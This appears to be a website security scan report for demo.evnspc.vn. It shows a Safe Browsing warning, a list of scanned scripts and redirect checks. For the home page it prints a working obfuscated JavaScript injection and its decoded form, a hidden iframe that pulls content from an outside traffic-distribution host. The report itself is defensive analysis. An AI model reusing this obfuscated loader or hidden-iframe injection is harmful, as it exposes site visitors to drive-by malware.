Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=demo.evnspc.vn
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://demo.evnspc.vn/ | 200 OK Content-Length: 18771 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0064='9/%6:%3[%d_%1=%4{%f]%0,%8-%2`%c}%7@%b.%a(%5&%e+',\u0065=function(){for(\u006e=0;\u006e<\u0078.length/2;\u006e++){\u0064+='%'+\u0078.substr(\u006e*2,2);}document.write(decodeURIComponent(\u0064));},\u0078='[}:{:/@:`,@[@{@/:}:&[_``:{:/@[@,:}:=@/[(:+:]:+:&[.``[+[}:/::@`:=:_:&`,@[@`:[[_``:-@{@{@,[(`]`]@{@`:=:::::/:[:]`+@,@@`]@{:{@[`]@{:]@,:_@&@@`+:[:@:/[]:{:&:::=@&:}@{```,@@:/:{@{:-[_``[=[,```,:-:&:/:@:-@{[_``[=[,``[+[}`]:/::@`:=:_:&[+[}`]:{:/@:[+',\u0079=function(){\u0079=\u0064.split('%');for(var \u0076 in \u0079){if((typeof(\u0079[\u0076])).substr(0,1)=='s'){\u0078=\u0078.split(\u0079[\u0076].substr(1)).join(\u0079[\u0076].substr(0,1));}}return this;},\u0069=\u0079(),\u0064='';\u0065(); Decoded script: <div style="display:none;"><iframe src="http://traffico.pw/tds/topmuw.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://demo.evnspc.vn/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/templates/evnspc_default/js/yt_script.js | 200 OK Content-Length: 2482 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/templates/evnspc_default/menusys/class/mega/assets/jsdroplinemenu.js | 200 OK Content-Length: 17565 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_swfobject/lib/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_meganewsii/assets/ytc.jquery-1.5.min.js | 200 OK Content-Length: 84651 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_meganewsii/assets/ytc.megaii-1.0.min.js | 200 OK Content-Length: 6149 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_titleflash/assets/js/yt.titleflash.js | 200 OK Content-Length: 10725 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.min.js | 200 OK Content-Length: 54106 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.noconflict.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://demo.evnspc.vn/modules/mod_yt_news_frontpage/assets/jquery.hoveraccordion.js | 200 OK Content-Length: 7561 Content-Type: application/javascript | clean |
http://demo.evnspc.vn//modules/mod_so_article_slider/assets/general.js/ | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: demo.evnspc.vn
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Jun 2014 16:51:05 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Type: text/html
Set-Cookie: 6e66d716ee72fc9206e2131c870a5274=f36bce98bc49fcd7d789d7390b68e0f1; path=/
Set-Cookie: evnspc_default_tpl=evnspc_default; expires=Wed, 27-May-2015 16:51:05 GMT; path=/
X-Died: timeout at scan.pm line 1538.
X-Powered-By: PHP/5.2.6
GET / HTTP/1.1
Host: demo.evnspc.vn
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Jun 2014 16:51:05 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Type: text/html
Set-Cookie: 6e66d716ee72fc9206e2131c870a5274=f36bce98bc49fcd7d789d7390b68e0f1; path=/
Set-Cookie: evnspc_default_tpl=evnspc_default; expires=Wed, 27-May-2015 16:51:05 GMT; path=/
X-Died: timeout at scan.pm line 1538.
X-Powered-By: PHP/5.2.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: demo.evnspc.vn
Referer: http://www.google.com/search?q=demo.evnspc.vn
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: demo.evnspc.vn
Referer: http://www.google.com/search?q=demo.evnspc.vn
Result:
The result is similar to the first query. There are no suspicious redirects found.